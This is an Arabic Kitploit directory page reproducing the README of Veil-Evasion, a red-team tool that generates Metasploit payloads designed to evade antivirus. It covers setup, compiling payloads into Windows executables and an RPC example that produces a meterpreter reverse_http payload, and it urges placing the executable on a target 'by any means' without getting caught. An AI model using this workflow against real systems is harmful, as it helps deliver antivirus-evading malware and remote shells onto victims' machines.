Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Veil-Evasion — لم يعد Veil Evasion مدعومًا، استخدم Veil 3.0! | Kitploit
أدوات/GitHubGitHub/veil-framework/veil-evasion
أطر الاستغلالتوليد الحمولةاختبار الاختراقالقيادة والسيطرةتوليد شيفرة القشرةArchived
GitHubveil-framework/veil-evasion

Veil-Evasion

لم يعد Veil Evasion مدعومًا، استخدم Veil 3.0!

عرض المستودع
1.8k6756منذ 4 سنواتتمت المراجعة من قبل Kitploit
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Veil-Evasion

Veil-Evasion هي أداة مصممة لتوليد حمولات metasploit التي تتجاوز حلول مكافحة الفيروسات الشائعة.

ملاحظة: يجب إعادة تشغيل ./setup/setup.sh بعد كل تحديث رئيسي للإصدار. إذا واجهت أي أخطاء رئيسية عند تشغيل Veil-Evasion، فجرّب أولاً إعادة تشغيل هذا السكربت لتثبيت أي حزم إضافية وتحديث ملف التهيئة المشترك.

Veil-Evasion قيد الدعم النشط حاليًا من قبل @ChrisTruncer، @TheMightyShiv، @HarmJ0y.

شكرًا لـ:

  • @jasonjfrank
  • @mjmaley
  • @davidpmcguire

متطلبات البرامج:

لينكس

  1. استخدم Kali (x86) وستكون جميع التبعيات مثبتة مسبقًا

أو

  1. قم بتثبيت Python 2.7
  2. قم بتثبيت PyCrypto >= 2.3

ويندوز (لتجميع Py2Exe)

  1. Python (تم اختباره مع x86 - http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  3. PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
  4. PyWin32 (http://sourceforge.net/projects/pywin32/files/pywin32/Build%20218/pywin32-218.win32-py2.7.exe/download)

الإعداد (tl;dr)

ملاحظة: يجب أن يتم التثبيت بصلاحيات المستخدم المتميز. إذا لم تكن تستخدم Kali Linux، فضع sudo أمام كل أمر أو بدّل إلى المستخدم الجذر قبل البدء.

قم بتشغيل setup.sh -c على Kali x86.

قم بتثبيت Python 2.7 و Py2Exe و PyCrypto و PyWin32 على جهاز ويندوز (لتجميع Py2Exe).

التثبيت السريع

root@kitploit:~
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c

إعادة توليد الإعدادات

ملاحظة: يجب أن يتم ذلك بصلاحيات المستخدم المتميز. إذا لم تكن تستخدم Kali Linux، فضع sudo أمام كل أمر أو بدّل إلى المستخدم الجذر قبل البدء.

في معظم الأحيان، لن يحتاج ملف الإعدادات في /etc/veil/settings.py إلى إعادة بناء، ولكن في بعض الحالات قد يُطلب منك ذلك. يتم إنشاء الملف بواسطة config/update.py.

من المهم أن تكون في الدليل config/ قبل تنفيذ update.py. إذا لم تكن كذلك، فسيكون settings.py غير صحيح وعند تشغيل Veil-Evasion سترى ما يلي.

root@kitploit:~
    Main Menu

            0 payloads loaded

لا داعي للذعر. أدخل الدليل config/ وأعد تشغيل update.py.

الوصف

صُمم Veil-Evasion ليعمل على Kali Linux، ولكن يجب أن يعمل على أي نظام قادر على تنفيذ سكريبتات Python. ببساطة قم باستدعاء Veil-Evasion من سطر الأوامر، واتبع القائمة لإنشاء حمولة. عند إنشاء الحمولة، سيسألك Veil-Evasion إذا كنت ترغب في تحويل ملف الحمولة إلى ملف تنفيذي بواسطة Pyinstaller أو Py2Exe.

إذا كنت تستخدم Pyinstaller، فسيقوم Veil-Evasion بتحويل حمولتك إلى ملف تنفيذي داخل Kali.

إذا كنت تستخدم Py2Exe، فسينشئ Veil-Evasion ثلاثة ملفات:

  • payload.py - ملف الحمولة
  • setup.py - ملف مطلوب لـ Py2Exe
  • runme.bat - سكريبت دفعي لتجميع الحمولة إلى ملف ويندوز تنفيذي

انقل جميع الملفات الثلاثة إلى جهاز ويندوز الخاص بك مع تثبيت Python. يجب وضع الملفات الثلاثة في جذر الدليل الذي تم تثبيت Python فيه (على الأرجح C:\Python27). قم بتشغيل السكريبت الدفعي لتحويل سكريبت Python إلى صيغة تنفيذية.

ضع الملف التنفيذي على جهازك الهدف بأي وسيلة ضرورية ولا تقع!

خادم RPC

على جانب المستمع، قم بتشغيل:

./Veil-Evasion --rpc

سيبدأ هذا مستمعًا على المنفذ 4242.

على جانب العميل، ستحتاج إلى تشغيل برنامج عميل. يمكن أن يكون هذا سكريبتًا مخصصًا أو يمكن أن يكون بسيطًا مثل Netcat. ينفذ خادم RPC بروتوكول JSON-RPC. هذا مرجع جيد لتفسير الطلبات والاستجابات لـ JSON-RPC: http://json-rpc.org/wiki/specification

تنسيق طلب RPC هو كما يلي:

root@kitploit:~
    method="version"            -   يُرجع رقم إصدار Veil-Evasion الحالي
    method="payloads"           -   يُرجع جميع الحمولات المحملة حاليًا
    method="payload_options"
        params="payload_name"   -   يُرجع الخيارات للحمولة المحددة
    method="generate"
        params=["payload=X",   
                "outputbase=Y"
                "overwrite=Z",
                "msfvenom=...",
                "LHOST=blah]     -   يُنشئ الحمولة المحددة مع الخيارات المُعطاة ويُعيد مسار الملف التنفيذي المُنتج

هذا مثال بسيط للعمل مع Veil-Evasion باستخدام Netcat:

root@kitploit:~
root@kali:~# nc 127.0.0.1 4242
{"method":"version","params":[],"id":0}

واستجابة الخادم:

root@kitploit:~
{"id":0,"result":"2.21.4","error":null}

يمكن العثور على مثال لبرنامج عميل هنا: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py

ملاحظة: منفذ Veil-Evasion هو 4242. يجب تغيير هذا في client.py ليعمل معه.

من أجل إنشاء حمولة، يجب تضمين جميع المعاملات:

  • payload - أي حمولة سيتم إنشاؤها
  • outputbase - الاسم الذي سيتم حفظ الحمولة به
  • LHOST - عنوان IP للمستمع
  • LPORT - منفذ المستمع
  • pwnstaller - True لتجميع برامج Python في ملف تنفيذي. False إذا لم يكن الأمر كذلك. يتم تجاهله للحمولات الأخرى

هذا مرجع جيد لفهم ما إذا كان pwnstaller قيد الاستخدام أم لا: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/

مثال على إنشاء حمولة:

root@kitploit:~
root@kali:~# nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}

واستجابة الخادم:

root@kitploit:~
{"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}

ملاحظة: إذا لم يتم تحديد id في الطلب، فسيتم إيقاف تشغيل Veil-Evasion. ومع ذلك، يمكنك تقديم عدد لا يحصى من الطلبات الصالحة حتى يتم إيقاف تشغيل Veil-Evasion.

لإيقاف تشغيل خادم RPC، قم بتشغيل:

./Veil-Evasion --rpcshutdown

تنزيل الأداة